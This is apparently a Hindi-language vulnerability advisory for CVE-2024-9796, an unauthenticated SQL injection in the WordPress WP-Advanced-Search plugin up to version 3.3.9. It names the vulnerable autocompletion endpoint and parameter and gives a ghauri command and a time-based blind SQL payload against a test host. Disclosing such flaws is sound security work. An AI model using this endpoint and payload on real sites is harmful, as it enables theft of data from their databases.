
वर्डप्रेस WP-Advanced-Search <= 3.3.9 - अनधिकृत SQL इंजेक्शन
वर्डप्रेस WP-Advanced-Search <= 3.3.9 - बिना प्रमाणीकरण के SQL इंजेक्शन
वर्डप्रेस के लिए WP-Advanced-Search प्लगइन, संस्करण 3.3.9 तक (और इसमें शामिल) के सभी संस्करणों में SQL इंजेक्शन के प्रति संवेदनशील है, जो उपयोगकर्ता द्वारा प्रदान किए गए पैरामीटर पर अपर्याप्त एस्केपिंग और मौजूदा SQL क्वेरी पर पर्याप्त तैयारी की कमी के कारण होता है। इससे बिना प्रमाणीकरण के हमलावरों के लिए मौजूदा क्वेरी में अतिरिक्त SQL क्वेरी जोड़ना संभव हो जाता है, जिसका उपयोग डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है।
Type: plugin
CVSS Score: 7.5
CVE: CVE-2024-9796
Slug: wp-advanced-search
डाउनलोड लिंक: wp-advanced-search संस्करण 3.3.9 डाउनलोड करें
ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5×tamp=19692269759899"
Parameter: f (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5×tamp=13672261755853'